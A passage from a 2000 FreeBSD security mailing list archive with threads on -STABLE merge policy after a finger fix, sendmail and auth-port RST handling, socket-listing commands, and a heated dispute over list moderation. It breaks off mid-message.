>A packet trace would be helpful here. I find ethereal to be quite an
>agreeable tool.
This is a good idea.

--Brett

From owner-freebsd-security Tue Oct 3 9:39:26 2000
From: Brett Glass
Date: Tue, 03 Oct 2000 10:37:58 -0600
To: Wes Peters
Cc: security@FreeBSD.ORG
Subject: Re: politeness

At 03:53 AM 10/3/2000, Wes Peters wrote:

>> Everyone has a right to write to the list and share his thoughts.
>
>No, the list has a charter. This is a republic, not a democracy.

Does that mean that to get something posted to the list, I need to
contact my representative, who doesn't respond to me because I'm not a
member of his political party? Or has a staffer send me back a
boilerplate form letter and then does what his large corporate
contributors want? ;-)

Aargh. I am very glad that mailing lists are NOT republics.
--Brett

From owner-freebsd-security Tue Oct 3 9:40:34 2000
From: Christopher Masto
Date: Tue, 3 Oct 2000 12:40:08 -0400
To: Warner Losh, Paul Richards
Cc: Kris Kennaway, Joseph Scott, Brian Somers, cvs-committers@FreeBSD.ORG,
    cvs-all@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: cvs commit: src/usr.bin/finger finger.c

On Tue, Oct 03, 2000 at 09:30:13AM -0600, Warner Losh wrote:
> : I think we push too many enhancements from current to stable, when we
> : should really only push bug fixes onto the stable branch. The tendency
> : to add enhancements carries the risk of actually creating new bugs in
> : stable which is obviously not what we want to have happen.
>
> Exactly. We shouldn't be merging features at all, unless there's a
> compelling reason, the code has been reviewed by at least two people
> and it has had at least a month or two in current. If you can't find
> two people to review the code, then you can't merge it to stable due
> to lack of interest.

The problem with being too cautious is that stable becomes unusable
and people who shouldn't be running current start moving to it because
stable doesn't support their new laptop.

I think it's important to push _some_ features into stable. Having to
wait several years for the next major "point-oh" release of FreeBSD
(which comes with "point-oh fear" holding it back) is not the best
way to do things. IMO. There's a place between these two extremes
of paranoia and wild abandon, and I think that's where the MFCs should
take place.
--
Christopher Masto        Senior Network Monkey      NetMonger Communications
chris@netmonger.net       info@netmonger.net        http://www.netmonger.net

Free yourself, free your machine, free the daemon -- http://www.freebsd.org/

From owner-freebsd-security Tue Oct 3 9:45:33 2000
From: James Wyatt
Date: Tue, 3 Oct 2000 11:25:18 -0500 (CDT)
To: Dag-Erling Smorgrav
Cc: Michael Bryan, security@FreeBSD.ORG
Subject: Re: cvs commit: src/etc inetd.conf
On 3 Oct 2000, Dag-Erling Smorgrav wrote:
> Michael Bryan writes:
> > A command that I -always- execute on any freshly installed system, and from
> > time to time when checking up on things:
> >
> > netstat -an
>
> Funny way to spell "sockstat except with less information" :)

More and less. netstat -an is longer, sockstat has more columns. I like
the PID given in sockstat, but is there any way to get them for Unix
domain sockets? I tried "apropos domain" and "(for DIR in `echo $PATH |
tr ':' ' '` ; do ls $DIR 2> /dev/null | grep stat ; done) | more", but
neither gave me much help... - Jy@

From owner-freebsd-security Tue Oct 3 9:50: 7 2000
From: Poul-Henning Kamp
Date: Tue, 03 Oct 2000 18:48:40 +0200
To: Brett Glass
Cc: Wes Peters, security@FreeBSD.ORG
Subject: Re: politeness

In message <4.3.2.7.2.20001003103503.04c68240@localhost>, Brett Glass writes:
>At 03:53 AM 10/3/2000, Wes Peters wrote:
>
>>> Everyone has a right to write to the list and share his thoughts.
>>
>>No, the list has a charter. This is a republic, not a democracy.
>
>Does that mean that to get something posted to the list, I need to
>contact my representative, who doesn't respond to me because
>I'm not a member of his political party? Or has a staffer send me
>back a boilerplate form letter and then does what his large
>corporate contributors want? ;-)

In your particular case: If you want to avoid being banned and
filtered: Yes, it means that.

In all my time in core, nobody even closely rivals your uncontested
number one ranking as the person most people want banned & filtered
from our lists.

Depending on your luck, or lack of it, the core team may finally have
had it with freedom, liberty and equality in your particular case, if
you don't learn to control your emails' style and quantity pretty damn
fast.

Doesn't the fact that you are universally more unpopular than anybody
else with the FreeBSD developers trigger any kind of thought process in
you ? Doesn't it make just a tiny little bit of doubt rear its ugly
head, questioning your approach when you communicate on our lists ?

I would have hoped so...

--
Poul-Henning Kamp       | UNIX since Zilog Zeus 3.20
phk@FreeBSD.ORG         | TCP/IP since RFC 956
FreeBSD coreteam member | BSD since 4.3-tahoe
Never attribute to malice what can adequately be explained by incompetence.
From owner-freebsd-security Tue Oct 3 9:58:44 2000
From: Warner Losh
Date: Tue, 03 Oct 2000 10:58:30 -0600
To: Christopher Masto
Cc: Paul Richards, Kris Kennaway, Joseph Scott, Brian Somers,
    cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: cvs commit: src/usr.bin/finger finger.c

In message <20001003124008.A4892@netmonger.net> Christopher Masto writes:
: The problem with being too cautious is that stable becomes unusable
: and people who shouldn't be running current start moving to it because
: stable doesn't support their new laptop.

That's a compelling reason. However, rushing it into stable to keep one
or two people from running -current isn't in our best interests either.
You'll notice that I say you need two people to check the code. If you
can't find two people to check the code, then nobody cares enough for it
to go into stable. Two people. I didn't say two committers, but two
people who can review the code. If you can't meet that low threshold,
then you shouldn't merge the new feature. Period.

: I think it's important to push _some_ features into stable. Having to
: wait several years for the next major "point-oh" release of FreeBSD
: (which comes with "point-oh fear" holding it back) is not the best
: way to do things. IMO. There's a place between these two extremes
: of paranoia and wild abandon, and I think that's where the MFCs should
: take place.

I don't advocate paranoia. I advocate caution and good engineering
practices before code can be allowed into MFC, especially new features.
We used to be really good about this and as we've grown the cautious
merge into -stable ethic has become diluted. It is time to tighten
things down for a while again. The finger thing has shown that the
current practices are too loose.

Warner

From owner-freebsd-security Tue Oct 3 10: 2: 1 2000
From: Mike Silbersack
Date: Tue, 3 Oct 2000 12:03:07 -0500 (CDT)
To: Nate Williams
Cc: Jordan Hubbard, Alfred Perlstein, "Jordan K. Hubbard", security@FreeBSD.ORG
Subject: Re: cvs commit: src/etc inetd.conf

On Tue, 3 Oct 2000, Nate Williams wrote:

> > Isn't sendmail just as happy getting a RST back when it tries to
> > connect?
>
> Yep, but it slows mail transfers down quite a bit.
>
>
> Nate

Does sendmail retry when it gets a connection refused back? If it's only
trying once, there shouldn't be any extra delay that I can see.

Mike "Silby" Silbersack

From owner-freebsd-security Tue Oct 3 10: 5:29 2000
From: Nate Williams
Reply-To: nate@yogotech.com (Nate Williams)
Date: Tue, 3 Oct 2000 11:05:05 -0600 (MDT)
To: Mike Silbersack
Cc: Nate Williams, Jordan Hubbard, Alfred Perlstein, "Jordan K. Hubbard",
    security@FreeBSD.ORG
Subject: Re: cvs commit: src/etc inetd.conf

> > > Isn't sendmail just as happy getting a RST back when it tries to
> > > connect?
> >
> > Yep, but it slows mail transfers down quite a bit.
> >
> >
> > Nate
>
> Does sendmail retry when it gets a connection refused back?

Yep, but having to do a retry for every incoming connection can be quite
a slowdown when you receive *LOTS* of email. Any FreeBSD user who has
that on his box is slowing down delivery of email significantly, because
the FreeBSD mailing lists tend to generate *lots* of email messages. :)

Nate

From owner-freebsd-security Tue Oct 3 10:16:25 2000
To: security@freebsd.org
Subject: Re: cvs commit: src/etc inetd.conf
In-reply-to: Your message of "Tue, 03 Oct 2000 11:05:05 MDT."
<200010031705.LAA23799@nomad.yogotech.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Tue, 03 Oct 2000 18:16:12 +0100 From: David Pick Message-Id: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > > > Isn't sendmail just as happy getting a RST back when it tries to > > > > connect? > > > > > > Yep, but it slows mail transfers down quite a bit. > > > > > > > > > Nate > > > > Does sendmail retry when it gets a connection refused back? > > Yep, but having to do a retry for every incoming connection can be quite > a slowdown when you receive *LOTS* of email. Any FreeBSD user who has > that on his box is slowing down delivery of email significantly, because > the FreeBSD mailing lists tend to generate *lots* of email messages. :) Sorry, I don't get this. If sendmail attempts to call the "auth" port on the sending machine and gets a response it should be happy. If it gets no response (after a time-out) it would be entitled to retry a few times in case of packet loss. *But* if it gets a RST, which is a positive rejection of the connection attempt, it can deduce that there is *no* "auth" service on the remote machine, and that retrys are a waste of time. Most clients (like "telnet") report this as "connection refused" if it happens on the main connection channel. An ICMP response might well be a transient condition, but a RST isn't. Unless sendmail takes the view that *any* error *might* be a transient condition and a retry or two worthwhile. 
-- David Pick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 10:19:17 2000 Delivered-To: freebsd-security@freebsd.org Received: from whale.sunbay.crimea.ua (whale.sunbay.crimea.ua [212.110.138.65]) by hub.freebsd.org (Postfix) with ESMTP id 304F937B502 for ; Tue, 3 Oct 2000 10:19:13 -0700 (PDT) Received: (from ru@localhost) by whale.sunbay.crimea.ua (8.11.0/8.11.0) id e93HIrP65664; Tue, 3 Oct 2000 20:18:53 +0300 (EEST) (envelope-from ru) Date: Tue, 3 Oct 2000 20:18:53 +0300 From: Ruslan Ermilov To: James Wyatt Cc: security@FreeBSD.ORG Subject: Re: cvs commit: src/etc inetd.conf Message-ID: <20001003201853.A64879@sunbay.com> Mail-Followup-To: James Wyatt , security@FreeBSD.ORG References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from jwyatt@rwsystems.net on Tue, Oct 03, 2000 at 11:25:18AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Oct 03, 2000 at 11:25:18AM -0500, James Wyatt wrote: > On 3 Oct 2000, Dag-Erling Smorgrav wrote: > > Michael Bryan writes: > > > A command that I -always- execute on any freshly installed system, and from > > > time to time when checking up on things: > > > > > > netstat -an > > > > Funny way to spell "sockstat except with less information" :) > > More and less. netstat -an is longer, sockstat has more columns. I like > the PID given in sockstat, but is there any way to get them for Unix > domain sockets? I tried "apropos domain" and "(for DIR in `echo $PATH | tr > ':' ' '` ; do ls $DIR 2> /dev/null | grep stat ; done) | more", but > neither gave me much help... - Jy@ > Sure there is, try `netstat -an -funix' followed by `fstat | grep local'. 
-- Ruslan Ermilov Oracle Developer/DBA, ru@sunbay.com Sunbay Software AG, ru@FreeBSD.org FreeBSD committer, +380.652.512.251 Simferopol, Ukraine http://www.FreeBSD.org The Power To Serve http://www.oracle.com Enabling The Information Age To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 10:22:38 2000 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 50BA637B66C for ; Tue, 3 Oct 2000 10:22:35 -0700 (PDT) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id NAA41823; Tue, 3 Oct 2000 13:22:27 -0400 (EDT) (envelope-from wollman) Date: Tue, 3 Oct 2000 13:22:27 -0400 (EDT) From: Garrett Wollman Message-Id: <200010031722.NAA41823@khavrinen.lcs.mit.edu> To: David Pick Cc: security@FreeBSD.ORG Subject: Re: cvs commit: src/etc inetd.conf In-Reply-To: References: <200010031705.LAA23799@nomad.yogotech.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > gets no response (after a time-out) it would be entitled to retry a > few times in case of packet loss. *But* if it gets a RST, which is a If net.inet.tcp.blackhole is set, an RST will not be emitted. -GAWollman -- Garrett A. 
Wollman | O Siem / We are all family / O Siem / We're all the same wollman@lcs.mit.edu | O Siem / The fires of freedom Opinions not those of| Dance in the burning flame MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 10:23: 2 2000 Delivered-To: freebsd-security@freebsd.org Received: from public.bta.net.cn (public.bta.net.cn [202.96.0.97]) by hub.freebsd.org (Postfix) with SMTP id 5D81037B503 for ; Tue, 3 Oct 2000 10:22:59 -0700 (PDT) Received: from netrinsics.com([202.106.4.185]) by public.bta.net.cn(JetMail 2.5.3.0) with SMTP id jm039da5f8a; Tue, 3 Oct 2000 17:22:51 -0000 Received: (from robinson@localhost) by netrinsics.com (8.11.0/8.9.3) id e93HM4d03128; Wed, 4 Oct 2000 01:22:04 +0800 (+0800) (envelope-from robinson) Date: Wed, 4 Oct 2000 01:22:04 +0800 (+0800) From: Michael Robinson Message-Id: <200010031722.e93HM4d03128@netrinsics.com> To: phk@critter.freebsd.dk Subject: Re: politeness Cc: security@FreeBSD.ORG In-Reply-To: <49242.970591720@critter> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >In all my time in core, nobody even closely rivals your uncontested >number one ranking as the person most people want banned & filtered >from our lists. Is there someplace non-core members can vote on this? A cgi form or something? 
-Michael Robinson To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 10:26:40 2000 Delivered-To: freebsd-security@freebsd.org Received: from critter.freebsd.dk (flutter.freebsd.dk [212.242.40.147]) by hub.freebsd.org (Postfix) with ESMTP id 6459F37B66C for ; Tue, 3 Oct 2000 10:26:33 -0700 (PDT) Received: from critter (localhost [127.0.0.1]) by critter.freebsd.dk (8.11.0/8.9.3) with ESMTP id e93HQSN49536; Tue, 3 Oct 2000 19:26:28 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: Michael Robinson Cc: security@FreeBSD.ORG Subject: Re: politeness In-Reply-To: Your message of "Wed, 04 Oct 2000 01:22:04 +0800." <200010031722.e93HM4d03128@netrinsics.com> Date: Tue, 03 Oct 2000 19:26:28 +0200 Message-ID: <49534.970593988@critter> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <200010031722.e93HM4d03128@netrinsics.com>, Michael Robinson writes: >>In all my time in core, nobody even closely rivals your uncontested >>number one ranking as the person most people want banned & filtered >>from our lists. > >Is there someplace non-core members can vote on this? A cgi form or something? Send email to core. -- Poul-Henning Kamp | UNIX since Zilog Zeus 3.20 phk@FreeBSD.ORG | TCP/IP since RFC 956 FreeBSD coreteam member | BSD since 4.3-tahoe Never attribute to malice what can adequately be explained by incompetence. 
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 10:32:13 2000 Delivered-To: freebsd-security@freebsd.org Received: from orthanc.ab.ca (207-167-15-66.dsl.worldgate.ca [207.167.15.66]) by hub.freebsd.org (Postfix) with ESMTP id 3114B37B66C for ; Tue, 3 Oct 2000 10:32:07 -0700 (PDT) Received: from orthanc.ab.ca (localhost [127.0.0.1]) by orthanc.ab.ca (8.11.0/8.11.0.Beta3) with ESMTP id e93HVRE59359; Tue, 3 Oct 2000 11:31:27 -0600 (MDT) Message-Id: <200010031731.e93HVRE59359@orthanc.ab.ca> To: David Pick Cc: security@FreeBSD.ORG Subject: Re: cvs commit: src/etc inetd.conf In-reply-to: Your message of "Tue, 03 Oct 2000 18:16:12 BST." Date: Tue, 03 Oct 2000 11:31:27 -0600 From: Lyndon Nerenberg Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >>>>> "David" == David Pick writes: David> Sorry, I don't get this. If sendmail attempts to call the David> "auth" port on the sending machine and gets a response it David> should be happy. If it gets no response (after a time-out) David> it would be entitled to retry a few times in case of packet David> loss. No it wouldn't. TCP takes care of the retries for you. If the auth service is blocked by a firewall the firewall will usually eat the SYN packets, and you will never get a RST. 
--lyndon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 10:32:39 2000 Delivered-To: freebsd-security@freebsd.org Received: from mailgate.originative.co.uk (mailgate.originative.co.uk [194.217.50.228]) by hub.freebsd.org (Postfix) with ESMTP id ABE6C37B502; Tue, 3 Oct 2000 10:32:29 -0700 (PDT) Received: from originative.co.uk (lobster.originative.co.uk [194.217.50.241]) by mailgate.originative.co.uk (Postfix) with ESMTP id 5B07D1D140; Tue, 3 Oct 2000 18:32:28 +0100 (BST) Message-ID: <39DA182C.C70ED553@originative.co.uk> Date: Tue, 03 Oct 2000 18:32:28 +0100 From: Paul Richards X-Mailer: Mozilla 4.74 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 To: Christopher Masto Cc: Warner Losh , Kris Kennaway , Joseph Scott , Brian Somers , cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: cvs commit: src/usr.bin/finger finger.c References: <39D98B55.126DAFC4@originative.co.uk> <200010022227.PAA62603@freefall.freebsd.org> <39D92E08.E00CF2E4@owp.csus.edu> <20001002180303.A40584@freefall.freebsd.org> <39D98B55.126DAFC4@originative.co.uk> <200010031530.JAA26493@harmony.village.org> <20001003124008.A4892@netmonger.net> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Christopher Masto wrote: > > On Tue, Oct 03, 2000 at 09:30:13AM -0600, Warner Losh wrote: > > : I think we push too many enhancements from current to stable, when we > > : should really only push bug fixes onto the stable branch. The tendency > > : to add enhancements carries the risk of actually creating new bugs in > > : stable which is obviously not what we want to have happen. > > > > Exactly. 
We shouldn't be merging features at all, unless there's a > > compelling reason, the code has been reviewed by at least two people > > and it has had at least a month or two in current. If you can't find > > two people to review the code, then you can't merge it to stable due > > to lack of interest. > > The problem with being too cautious is that stable becomes unusable > and people who shouldn't be running current start moving to it because > stable doesn't support their new laptop. The people who are using FreeBSD in production environments need to have bug fixes made available for their stable version of the OS. If applying bug fixes de-stabilises their production environment then they're not very happy at all. I think the emphasis of the stable branch should be too support those production users. The users who are chasing features will always be pushing for a "stable current" and want the best of both worlds; new features *and* stability. Unfortunately that's an unachievable ideal and we shouldn't penalise those who really need the stability in trying to meet it. We're not applying sound software engineering practices anymore and that used to be what differentiated us from other projects. New code needs to be thoroughly tested before it's stamped as suitable for production use and I think the desire to make life easier, by merging things sooner rather than later when they might get forgotten about, is having a detrimental effect on the quality of stable. I think we should have a stable release team, that changes to the stable branch should be gated through to ensure they're thouroughly tested and that there's a need for them to be backported. I'd be happy to work with anyone else who wants to volunteer to do that since maintaining a stable version of the OS is a major issue for me with my new hat on. 
Paul Richards FreeBSD Services Ltd To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 10:35:15 2000 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 4585537B503; Tue, 3 Oct 2000 10:35:11 -0700 (PDT) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id NAA42007; Tue, 3 Oct 2000 13:35:10 -0400 (EDT) (envelope-from wollman) Date: Tue, 3 Oct 2000 13:35:10 -0400 (EDT) From: Garrett Wollman Message-Id: <200010031735.NAA42007@khavrinen.lcs.mit.edu> To: Robert Watson Cc: security@FreeBSD.ORG Subject: Re: Multiple userids, one user In-Reply-To: References: <200010010526.BAA12242@khavrinen.lcs.mit.edu> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > providing the application with unfettered access to your X display does a I don't. The insecure applications run under a completely separate X server. Barring any gaping security holes in the X server, there is no way for these applications (netscape specifically) to communicate with those running in the more-trustworthy domain. -GAWollman -- Garrett A. 
Wollman | O Siem / We are all family / O Siem / We're all the same wollman@lcs.mit.edu | O Siem / The fires of freedom Opinions not those of| Dance in the burning flame MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 10:51:48 2000 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 75C2737B503; Tue, 3 Oct 2000 10:51:37 -0700 (PDT) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.9.3/8.9.3) with SMTP id NAA91193; Tue, 3 Oct 2000 13:51:23 -0400 (EDT) (envelope-from robert@fledge.watson.org) Date: Tue, 3 Oct 2000 13:51:23 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org To: Christopher Masto Cc: Warner Losh , Paul Richards , Kris Kennaway , Joseph Scott , Brian Somers , cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: cvs commit: src/usr.bin/finger finger.c In-Reply-To: <20001003124008.A4892@netmonger.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 3 Oct 2000, Christopher Masto wrote: > The problem with being too cautious is that stable becomes unusable > and people who shouldn't be running current start moving to it because > stable doesn't support their new laptop. > > I think it's important to push _some_ features into stable. Having to > wait several years for the next major "point-oh" release of FreeBSD > (which comes with "point-oh fear" holding it back) is not the best > way to do things. IMO. There's a place between these two extremes > of paranoia and wild abandon, and I think that's where the MFCs should > take place. 
There's certainly a middle ground, and we can't expect that it will necessarily keep everyone happy, but that middle ground would hopefully avoid the current situation. Time-testing of features, as well as peer review, are both extremely important aspects of stable and secure development. Several times over the last few months, we've seen things merged into -STABLE leaving it in an ususable state for days at a time. This is clearly not desirable. Similarly, we've seen things added to both -CURRENT and -STABLE without substantial review in advance of the commit. No one is questioning the qualifications of our committers, but I think it's the case that, in general, no single committer should rely on only their own review of code: a second pair of eyes goes a long way, and there's nothing like a few weeks of being burned in before backporting a change to -STABLE. It would be unfair of us to expect every line of code that is written to be perfect, but it is fair of us to expect that code be carefully reviewed for inclusion before it gets included in the release version of software deployed on hundreds of thousands of machines. We should be equally careful about changes in -CURRENT, of course, as -CURRENT has a nasty habit if becoming -STABLE every year or two :-). The FreeBSD development process is constantly evolving: expectations of high quality play an important role in that evolution. 
Robert N M Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 TIS Labs at Network Associates, Safeport Network Services To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 10:53: 1 2000 Delivered-To: freebsd-security@freebsd.org Received: from MCSMTP.MC.VANDERBILT.EDU (mcsmtp.mc.Vanderbilt.Edu [160.129.93.202]) by hub.freebsd.org (Postfix) with ESMTP id 94E8437B502 for ; Tue, 3 Oct 2000 10:52:59 -0700 (PDT) Subject: Re: politeness To: freebsd-security@freebsd.org X-Mailer: Lotus Notes Release 5.0.2a November 23, 1999 Message-ID: From: George.Giles@mcmail.vanderbilt.edu Date: Tue, 3 Oct 2000 12:54:34 -0500 X-MIMETrack: Serialize by Router on MCSMTP/VUMC/Vanderbilt(Release 5.0.3 |March 21, 2000) at 10/03/2000 12:51:12 PM MIME-Version: 1.0 Content-type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The measure of a free society is tolerance for speech which you abhor. Please desist in this nonsense, filter your inbox, not the group. 
George To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 11: 1: 6 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id BF94637B502; Tue, 3 Oct 2000 11:01:00 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.0/8.11.0) with ESMTP id e93I0vM10571; Tue, 3 Oct 2000 12:00:58 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id MAA27859; Tue, 3 Oct 2000 12:00:57 -0600 (MDT) Message-Id: <200010031800.MAA27859@harmony.village.org> To: Paul Richards Subject: Re: cvs commit: src/usr.bin/finger finger.c Cc: cvs-committers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Tue, 03 Oct 2000 18:32:28 BST." <39DA182C.C70ED553@originative.co.uk> References: <39DA182C.C70ED553@originative.co.uk> <39D98B55.126DAFC4@originative.co.uk> <200010022227.PAA62603@freefall.freebsd.org> <39D92E08.E00CF2E4@owp.csus.edu> <20001002180303.A40584@freefall.freebsd.org> <39D98B55.126DAFC4@originative.co.uk> <200010031530.JAA26493@harmony.village.org> <20001003124008.A4892@netmonger.net> Date: Tue, 03 Oct 2000 12:00:57 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <39DA182C.C70ED553@originative.co.uk> Paul Richards writes: : I think we should have a stable release team, that changes to the stable : branch should be gated through to ensure they're thouroughly tested and : that there's a need for them to be backported. I'd be happy to work with : anyone else who wants to volunteer to do that since maintaining a stable : version of the OS is a major issue for me with my new hat on. 
I'd support this strongly, both as Warner Losh, Committer and as Warner Losh, Security Officer. My current job uses -stable and needs to have it be sane at "all"[*] times, or we waste a lot of effort bringing in and backing out unstable versions (we do some sanity testing before bringing a version in, but there's only so much you can do). I'd be able to work on this on an irregular basis depending on how saturated I am at work. Warner [*] All == most of the time, maybe with a few short wiwndows from time to time when we prove that humans are maintaining stable. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 11: 6: 1 2000 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-c.mdsn1.wi.home.com [24.183.3.139]) by hub.freebsd.org (Postfix) with ESMTP id C6E7B37B502 for ; Tue, 3 Oct 2000 11:05:59 -0700 (PDT) Received: (qmail 33882 invoked by uid 1000); 3 Oct 2000 18:07:08 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 3 Oct 2000 18:07:08 -0000 Date: Tue, 3 Oct 2000 13:07:08 -0500 (CDT) From: Mike Silbersack To: Garrett Wollman Cc: David Pick , security@FreeBSD.ORG Subject: Re: cvs commit: src/etc inetd.conf In-Reply-To: <200010031722.NAA41823@khavrinen.lcs.mit.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 3 Oct 2000, Garrett Wollman wrote: > < said: > > > gets no response (after a time-out) it would be entitled to retry a > > few times in case of packet loss. *But* if it gets a RST, which is a > > If net.inet.tcp.blackhole is set, an RST will not be emitted. > > -GAWollman If you're paranoid enough to block RST, you probably wouldn't leave auth on anyway. In either case, blocked RST wasn't the questioned case. I'm still curious what sendmail does on refused connections. 
Does anyone know for sure? Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 11: 8: 3 2000 Delivered-To: freebsd-security@freebsd.org Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2]) by hub.freebsd.org (Postfix) with ESMTP id 56A1A37B66C for ; Tue, 3 Oct 2000 11:08:00 -0700 (PDT) Received: from bsdie.rwsystems.net([209.197.223.2]) (3991 bytes) by bsdie.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Tue, 3 Oct 2000 12:56:39 -0500 (CDT) (Smail-3.2.0.111 2000-Feb-17 #1 built 2000-Jun-25) Date: Tue, 3 Oct 2000 12:56:35 -0500 (CDT) From: James Wyatt To: Poul-Henning Kamp Cc: Brett Glass , Wes Peters , security@FreeBSD.ORG Subject: Re: politeness In-Reply-To: <49242.970591720@critter> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 3 Oct 2000, Poul-Henning Kamp wrote: > In message <4.3.2.7.2.20001003103503.04c68240@localhost>, Brett Glass writes: > >At 03:53 AM 10/3/2000, Wes Peters wrote: > > > >>> Everyone has a right to write to the list and share his thoughts. > >> > >>No, the list has a charter. This is a republic, not a democracy. > > > >Does that mean that to get something posted to the list, I need to > >contact my representative, who doesn't respond to me because > >I'm not a member of his political party? Or has a staffer send me > >back a boilerplate form letter and then does what his large > >corporate contributors want? ;-) Actually, I thought this was a pretty funny reply, having tried to contact my reps before. Unfortunately, someone with an axe to grind replied. 8{( > In your particular case: If you want to avoid being banned and > filtered: Yes, it means that. I smell something rotten in Denmark. No first amendment there, I guess. 
> In all my time in core, nobody even closely rivals your uncontested > number one ranking as the person most people want banned & filtered > from our lists. > > Depending on your luck, or lack of it, the core team may finally > have had it with freedom, liberty and equality in your particular > case, if you don't learn to control your emails style and quantity > pretty damn fast. More fascist control-speak? This sounds more and more like "I've been here forever so I know better and everyone agrees with me, so we're about to cut you off". Some of us have just been here for years, not "forever" and don't believe Brett should die or be filtered on the mailing list. If you feel he should be filtered, add him to your own filter, not ours. Does one person speak for the core team? (Besides Jordan... 8{) Please tell me that I'm over- or misinterpretting you Paul. > Doesn't the fact that your are universally more unpopular than anybody > else with the FreeBSD developers trigger any kind of thought process > in you ? Doesn't it make just a tiny little bit of doubt rear its > ugly head, questioning your approach when you communicate on our lists? He's popular, but some of his assertions aren't. (^_^) His posts sometimes have folks like myself asking for real facts as 